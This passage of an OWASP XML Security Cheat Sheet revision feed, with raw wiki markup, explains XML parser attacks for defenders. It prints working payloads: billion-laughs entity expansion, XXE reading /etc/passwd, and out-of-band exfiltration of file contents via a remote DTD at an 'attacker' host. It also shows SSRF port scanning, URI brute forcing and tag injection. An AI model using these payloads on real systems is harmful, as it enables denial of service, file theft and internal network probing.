  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding 10^9 copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, that is, 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
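The size of the expansion follows from the nesting depth and the number of references per level. The following Java sketch only reproduces that arithmetic for the document above (nine levels, ten references per level, a three-character base string); the class and method names are hypothetical.&lt;br /&gt;
&lt;br /&gt;
```java
public class BillionLaughs {
    // Number of copies of the base string produced by the top-level entity:
    // each of `levels` entities repeats the previous one `fanout` times.
    public static long copies(int levels, int fanout) {
        long total = 1;
        for (int i = 0; i != levels; i++) {
            total = Math.multiplyExact(total, (long) fanout);
        }
        return total;
    }

    // Total characters after expansion for a base string of `baseLength` characters.
    public static long expandedChars(int levels, int fanout, int baseLength) {
        return Math.multiplyExact(copies(levels, fanout), (long) baseLength);
    }

    public static void main(String[] args) {
        System.out.println("Copies of the base string: " + copies(9, 10));
        System.out.println("Characters after expansion: " + expandedChars(9, 10, 3));
    }
}
```
&lt;br /&gt;
Because the growth is exponential in the number of levels, adding a single extra level to the document multiplies the result by ten.&lt;br /&gt;
&lt;br /&gt;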
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;&amp;lt;nowiki&amp;gt;URN:PARASOFT:WS:STORE&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, and which will be expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file served via HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External DNS Resolution ====&lt;br /&gt;
&lt;br /&gt;
Sometimes it is possible to induce the application to perform server-side DNS lookups of arbitrary domain names. This is one of the simplest forms of SSRF, but it requires the attacker to analyze the DNS traffic. Burp has a plugin that checks for this attack.&lt;br /&gt;
 &amp;lt;!DOCTYPE m PUBLIC &amp;quot;-//B/A/EN&amp;quot; &amp;quot;http://'''checkforthisspecificdomain'''.example.com&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % '''xxe''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/evil.dtd&amp;lt;/nowiki&amp;gt;'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM '&amp;lt;nowiki&amp;gt;http://example.com/?%file;&amp;lt;/nowiki&amp;gt;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario: with complete disclosure, you can clearly see what is going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: &amp;lt;nowiki&amp;gt;http://192.168.1.1:80&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If timeouts occur when trying to connect to a closed port (which may take one minute), while responses from an open port arrive very quickly (one second, for example), the difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
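The averaging step described for the time-based case can be sketched as follows. This Java example is purely illustrative: the class name, the threshold, and the timing samples in &amp;lt;tt&amp;gt;main&amp;lt;/tt&amp;gt; are invented for the example, and it assumes that slower responses indicate a closed port, which depends on the implementation being tested.&lt;br /&gt;
&lt;br /&gt;
```java
public class PortTiming {
    // Mean of the observed response times, in milliseconds.
    public static double averageMillis(long[] samples) {
        if (samples.length == 0) {
            throw new IllegalArgumentException("at least one sample is required");
        }
        long sum = 0;
        for (long s : samples) {
            sum += s;
        }
        return (double) sum / samples.length;
    }

    // Assumption: responses slower than the threshold indicate a closed port.
    public static boolean looksOpen(long[] samples, double thresholdMillis) {
        return thresholdMillis > averageMillis(samples);
    }

    public static void main(String[] args) {
        // Invented measurements, for illustration only.
        long[] firstPort = {12, 15, 11, 14};
        long[] secondPort = {950, 1020, 990, 1005};
        double threshold = 500.0;
        System.out.println("First port looks open:  " + looksOpen(firstPort, threshold));
        System.out.println("Second port looks open: " + looksOpen(secondPort, threshold));
    }
}
```
&lt;br /&gt;
On noisy networks a single average can be misleading, so more samples or a more robust statistic may be needed before drawing conclusions.&lt;br /&gt;
&lt;br /&gt;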
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme (http, ftp, etc.). For example:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
Fernando Arnaboldi - fernando.arnaboldi [at] ioactive.com&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=229386</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=229386"/>
				<updated>2017-05-03T19:53:14Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: Server Side Request Forgery: DNS Resolution. Removed unnecessary links.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt; __NOTOC__&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:Cheatsheets-header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot; style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
 __TOC__{{TOC hidden}}&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may normalize the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will replace the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;nowiki&amp;gt;&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;&amp;lt;/nowiki&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the restrictions that other schema languages can apply to XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
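&lt;br /&gt;
As a minimal sketch of how another schema language closes this gap, the following XML Schema constrains the same document. The limits used here (a name of 1 to 256 characters and an age of at most three digits, up to 150) are illustrative assumptions, not values taken from the DTD above:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;&amp;lt;nowiki&amp;gt;http://www.w3.org/2001/XMLSchema&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
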